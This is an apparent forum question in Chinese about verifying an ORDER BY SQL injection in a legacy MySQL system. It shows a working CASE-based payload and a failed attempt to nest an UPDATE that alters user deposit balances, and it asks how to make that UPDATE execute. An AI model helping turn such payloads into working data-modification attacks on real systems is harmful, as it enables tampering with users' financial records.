发现一个正在维护的老系统的基于orderBy的sql注入漏洞,准备验证一下,
我先执行这个sql注入,是可以的
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
select deposit
from sysuser_user_deposit
)end)=1 ASC LIMIT 20 OFFSET 0但是当我执行这个带update语句的sql时报错了:
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0报错
<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update<br>
sysuser_user_deposit<br>
set<br>
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0' at line 9</code>我应该如何让他执行update?
主体是select的时候,里面是不能update的,否则执行不了的,
mybatis这种注入我试过,<select>里执行update直接报错,注入不了